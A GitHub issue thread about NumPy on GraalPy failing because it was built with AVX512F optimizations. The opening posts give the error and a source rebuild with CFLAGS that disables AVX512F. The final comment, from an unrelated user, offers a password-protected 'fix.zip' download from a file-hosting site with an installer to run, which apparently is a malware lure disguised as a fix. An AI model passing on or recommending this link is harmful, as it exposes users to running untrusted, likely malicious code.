### ISSUE TITLE
NumPy fails with baseline optimization AVX512F

### ISSUE THREAD

**Issue by laserjim** [oracle/graalpython#419]
Creating an issue for posterity, somehow I got myself into a situation where after installing numpy and trying to run a program that used it, I got the following error:

```
RuntimeError: NumPy was built with baseline optimizations:
(SSE SSE2 SSE3 SSSE3 SSE41 POPCNT SSE42 AVX F16C FMA3 AVX2 AVX512F AVX512CD AVX512_SKX AVX512_CLX) but your machine doesn't support:
(AVX512F).
```

**Comment by laserjim** [comment]
Posting for posterity.  What resolved the issue for me was to do a pip uninstall purge the cache and then do a pip install with some cflags as below:
```
graalpy -m pip uninstall numpy
graalpy -m pip cache purge
CFLAGS="-march=native -O2 -mno-avx512f" graalpy -m pip install numpy==1.23.5 --no-cache-dir --no-binary :all:
```

This might be overly nuclear (I'm not sure that all those flags are necessary nor which ones specifically resolved my issue), but it worked for me ;).

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
